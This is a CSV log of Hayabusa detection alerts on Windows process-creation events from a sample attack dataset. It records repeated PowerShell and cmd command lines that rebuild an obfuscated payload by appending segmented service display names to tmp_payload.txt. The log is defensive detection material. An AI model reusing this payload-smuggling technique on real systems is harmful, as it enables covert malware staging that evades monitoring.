+2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
